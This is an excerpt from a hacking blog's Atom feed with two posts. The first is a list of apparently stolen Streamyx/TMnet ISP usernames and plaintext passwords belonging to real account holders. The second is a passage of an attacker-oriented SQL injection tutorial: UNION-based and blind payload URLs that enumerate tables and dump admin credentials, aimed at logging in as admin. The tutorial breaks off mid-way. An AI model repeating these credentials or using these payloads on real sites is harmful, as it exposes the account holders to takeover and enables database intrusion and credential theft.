blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet12&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;cindycpp@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;cindy&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;liza774@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;chaseup@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;emafira@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;fcare@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;epinoppi@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;thds@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;ssj429@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;haslina3@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;seetkl@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;lio2386&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;nms_info@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;tekoh88@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;ww3355&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;thtrd@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;kluang77@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;carrick&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;spchin1@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;umk01@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;lbh_5098@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;deen25@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;123456&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;lauwah69@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;lhw1322&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;kwj12@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;araeon@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;suzana1@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;mch2004@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;phongsb@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;wbwh2006@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;himan07@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;opsb1707@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;itabx@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;qskl@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;roymkhs1@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;TMM001&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;srcnhs@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;TMM001&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;ntmhs1@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;TMM001&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;kuw_22@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;ftx123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;essentia@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;sigrrafc@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;streamyx&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;sctham79@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;kurc9220@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;lkbskl@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;abc123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;klseah@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;klseah2045&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;hasnah66@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;cg1234&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-7012237024583261818?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/7012237024583261818/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/list-hacked-streamyx-username-password.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/7012237024583261818'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/7012237024583261818'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/list-hacked-streamyx-username-password.html' title='[LIST] Hacked Streamyx Username / Password [LIST]'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-4399487563135134063</id><published>2011-11-21T20:52:00.000-08:00</published><updated>2011-12-14T20:40:26.607-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>SQL Injection [Manual]</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_ZynwKym3gXI/TUHriq0D8jI/AAAAAAAAAd0/3a1k4Vyg_YY/s1600/sql_injection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="222" src="http://1.bp.blogspot.com/_ZynwKym3gXI/TUHriq0D8jI/AAAAAAAAAd0/3a1k4Vyg_YY/s320/sql_injection.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;First of all: What is SQL injection?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website in order to dump the database content to the attacker. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.&lt;br /&gt;Using well designed query language interpreters can prevent SQL injections. In the wild, it has been noted that applications experience, on average, 71 attempts an hour. When under direct attack, some applications occasionally came under aggressive attacks and at their peak, were attacked 800-1300 times per hour.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.SQL Injection (classic or error based or whatever you call it) big_smile&lt;br /&gt;&lt;br /&gt;2.Blind SQL Injection (the harder part)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So let's start with some action big_smile&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1). Check for vulnerability&lt;br /&gt;&lt;br /&gt;Let's say that we have some site like this&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5&lt;/blockquote&gt;&lt;br /&gt;Now to test if is vulrnable we add to the end of url ' (quote),&lt;br /&gt;&lt;br /&gt;and that would be &lt;span class="Apple-style-span" style="color: red;"&gt;http://www.site.com/news.php?id=5'&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;so if we get some error like&lt;br /&gt;"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."&lt;br /&gt;or something similar&lt;br /&gt;&lt;br /&gt;that means is vulrnable to sql injection smile&lt;br /&gt;&lt;br /&gt;2). Find the number of columns&lt;br /&gt;&lt;br /&gt;To find number of columns we use statement ORDER BY (tells database how to order the result)&lt;br /&gt;&lt;br /&gt;so how to use it? Well just incrementing the number until we get an error.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 order by 1/*&lt;br /&gt;http://www.site.com/news.php?id=5 order by 2/*&lt;br /&gt;http://www.site.com/news.php?id=5 order by 3/*&lt;br /&gt;http://www.site.com/news.php?id=5 order by 4/*&lt;/blockquote&gt;&lt;br /&gt;that means that the it has 3 columns, cause we got an error on 4.&lt;br /&gt;&lt;br /&gt;3). Check for UNION function&lt;br /&gt;&lt;br /&gt;With union we can select more data in one sql statement.&lt;br /&gt;&lt;br /&gt;so we have&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )&lt;/blockquote&gt;&lt;br /&gt;if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works smile&lt;br /&gt;&lt;br /&gt;4). Check for MySQL version&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --&lt;/blockquote&gt;it's a comment and it's important for our query to work properly.&lt;br /&gt;&lt;br /&gt;let say that we have number 2 on the screen, now to check for version&lt;br /&gt;we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.&lt;br /&gt;&lt;br /&gt;it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*&lt;br /&gt;&lt;br /&gt;if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."&lt;br /&gt;&lt;br /&gt;i didn't see any paper covering this problem, so i must write it smile&lt;br /&gt;&lt;br /&gt;what we need is convert() function&lt;br /&gt;&lt;br /&gt;i.e.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*&lt;br /&gt;or with hex() and unhex()&lt;/blockquote&gt;&lt;br /&gt;i.e.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*&lt;br /&gt;and you will get MySQL version big_smile&lt;/blockquote&gt;&lt;br /&gt;5). Getting table and column name&lt;br /&gt;&lt;br /&gt;well if the MySQL version is &amp;lt; 5 (i.e 4.1.33, 4.1.12...) 5 version.&lt;br /&gt;we must guess table and column name in most cases.&lt;br /&gt;&lt;br /&gt;common table names are: user/s, admin/s, member/s ...&lt;br /&gt;&lt;br /&gt;common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...&lt;br /&gt;&lt;br /&gt;i.e would be&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good big_smile)&lt;/blockquote&gt;&lt;br /&gt;we know that table admin exists...&lt;br /&gt;&lt;br /&gt;now to check column names.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)&lt;/blockquote&gt;&lt;br /&gt;we get username displayed on screen, example would be admin, or superadmin etc...&lt;br /&gt;&lt;br /&gt;now to check if column password exists&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)&lt;/blockquote&gt;&lt;br /&gt;we seen password on the screen in hash or plain-text, it depends of how the database is set up smile&lt;br /&gt;&lt;br /&gt;i.e md5 hash, mysql hash, sha1...&lt;br /&gt;&lt;br /&gt;now we must complete query to look nice smile&lt;br /&gt;&lt;br /&gt;for that we can use concat() function (it joins strings)&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*&lt;/blockquote&gt;&lt;br /&gt;Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)&lt;br /&gt;&lt;br /&gt;(there is another way for that, char(58), ascii value for : )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*&lt;/blockquote&gt;&lt;br /&gt;now we get dislayed usernameassword on screen, i.e admin:admin or admin:somehash&lt;br /&gt;&lt;br /&gt;when you have this, you can login like admin or some superuser big_smile&lt;br /&gt;&lt;br /&gt;if can't guess the right table name, you can always try mysql.user (default)&lt;br /&gt;&lt;br /&gt;it has user i password columns, so example would be&lt;br /&gt;&lt;br /&gt;http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*&lt;br /&gt;&lt;br /&gt;6). MySQL 5&lt;br /&gt;&lt;br /&gt;Like i said before i'm gonna explain how to get table and column names&lt;br /&gt;in MySQL &amp;gt; 5.&lt;br /&gt;&lt;br /&gt;For this we need information_schema. It holds all tables and columns in database.&lt;br /&gt;&lt;br /&gt;to get tables we use table_name and information_schema.tables.&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*&lt;/blockquote&gt;&lt;br /&gt;here we replace the our number 2 with table_name to get the first table from information_schema.tables&lt;br /&gt;&lt;br /&gt;displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*&lt;/blockquote&gt;&lt;br /&gt;note that i put 0,1 (get 1 result starting from the 0th)&lt;br /&gt;&lt;br /&gt;now to view the second table, we change limit 0,1 to limit 1,1&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*&lt;/blockquote&gt;&lt;br /&gt;the second table is displayed.&lt;br /&gt;&lt;br /&gt;for third table we put limit 2,1&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*&lt;/blockquote&gt;&lt;br /&gt;keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... big_smile&lt;br /&gt;&lt;br /&gt;To get the column names the method is the same.&lt;br /&gt;&lt;br /&gt;here we use column_name and information_schema.columns&lt;br /&gt;&lt;br /&gt;the method is same as above so example would be&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*&lt;/blockquote&gt;&lt;br /&gt;the first column is diplayed.&lt;br /&gt;&lt;br /&gt;the second one (we change limit 0,1 to limit 1,1)&lt;br /&gt;&lt;br /&gt;ie.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*&lt;/blockquote&gt;&lt;br /&gt;the second column is displayed, so keep incrementing until you get something like&lt;br /&gt;&lt;br /&gt;username,user,login, password, pass, passwd etc... big_smile&lt;br /&gt;&lt;br /&gt;if you wanna display column names for specific table use this query. (where clause)&lt;br /&gt;&lt;br /&gt;let's say that we found table users.&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*&lt;/blockquote&gt;&lt;br /&gt;now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.&lt;br /&gt;&lt;br /&gt;Note that this won't work if the magic quotes is ON.&lt;br /&gt;&lt;br /&gt;let's say that we found colums user, pass and email.&lt;br /&gt;&lt;br /&gt;now to complete query to put them all together big_smile&lt;br /&gt;&lt;br /&gt;for that we use concat() , i decribe it earlier.&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*&lt;/blockquote&gt;&lt;br /&gt;what we get here is userass:email from table users.&lt;br /&gt;&lt;br /&gt;example: admin:hash:whatever@blabla.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;That's all in this part, now we can proceed on harder part smile&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Blind SQL Injection&lt;br /&gt;&lt;br /&gt;Blind injection is a little more complicated the classic injection but it can be done big_smile&lt;br /&gt;&lt;br /&gt;I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it big_smile&lt;br /&gt;&lt;br /&gt;Let's start with advanced stuff.&lt;br /&gt;&lt;br /&gt;I will be using our example&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5&lt;/blockquote&gt;&lt;br /&gt;when we execute this, we see some page and articles on that page, pictures etc...&lt;br /&gt;&lt;br /&gt;then when we want to test it for blind sql injection attack&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and 1=1&lt;/blockquote&gt;&lt;br /&gt;and the page loads normally, that's ok.&lt;br /&gt;&lt;br /&gt;now the real test&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and 1=2&lt;/blockquote&gt;&lt;br /&gt;so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.&lt;br /&gt;&lt;br /&gt;1) Get the MySQL version&lt;br /&gt;&lt;br /&gt;to get the version in blind attack we use substring&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4&lt;/blockquote&gt;&lt;br /&gt;this should return TRUE if the version of MySQL is 4.&lt;br /&gt;&lt;br /&gt;replace 4 with 5, and if query return TRUE then the version is 5.&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;br /&gt;http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5&lt;/blockquote&gt;&lt;br /&gt;2) Test if subselect works&lt;br /&gt;&lt;br /&gt;when select don't work then we use subselect&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;http://www.site.com/news.php?id=5 and (select 1)=1&lt;br /&gt;&lt;br /&gt;if page loads normally then subselects work.&lt;br /&gt;&lt;br /&gt;then we gonna see if we have access to mysql.user&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1&lt;/blockquote&gt;&lt;br /&gt;if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.&lt;br /&gt;&lt;br /&gt;3). Check table and column names&lt;br /&gt;&lt;br /&gt;This is part when guessing is the best friend smile&lt;br /&gt;&lt;br /&gt;i.e.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)&lt;/blockquote&gt;&lt;br /&gt;then if the page loads normally without content missing, the table users exits.&lt;br /&gt;if you get FALSE (some article missing), just change table name until you guess the right one smile&lt;br /&gt;&lt;br /&gt;let's say that we have found that table name is users, now what we need is column name.&lt;br /&gt;&lt;br /&gt;the same as table name, we start guessing. Like i said before try the common names for columns.&lt;br /&gt;&lt;br /&gt;i.e&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1&lt;/blockquote&gt;&lt;br /&gt;if the page loads normally we know that column name is password (if we get false then try common names or just guess)&lt;br /&gt;&lt;br /&gt;here we merge 1 with the column password, then substring returns the first character (,1,1)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4). Pull data from database&lt;br /&gt;&lt;br /&gt;we found table users i columns username password so we gonna pull characters from that.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;80&lt;/blockquote&gt;&lt;br /&gt;ok this here pulls the first character from first user in table users.&lt;br /&gt;&lt;br /&gt;substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value&lt;br /&gt;&lt;br /&gt;and then compare it with simbol greater then &amp;gt; .&lt;br /&gt;&lt;br /&gt;so if the ascii char greater then 80, the page loads normally. (TRUE)&lt;br /&gt;&lt;br /&gt;we keep trying until we get false.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;95&lt;/blockquote&gt;&lt;br /&gt;we get TRUE, keep incrementing&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;98&lt;/blockquote&gt;&lt;br /&gt;TRUE again, higher&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;99&lt;/blockquote&gt;&lt;br /&gt;FALSE!!!&lt;br /&gt;&lt;br /&gt;so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.&lt;br /&gt;&lt;br /&gt;then let's check the second character.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))&amp;gt;99&lt;/blockquote&gt;&lt;br /&gt;Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)&lt;br /&gt;&lt;br /&gt;&lt;br 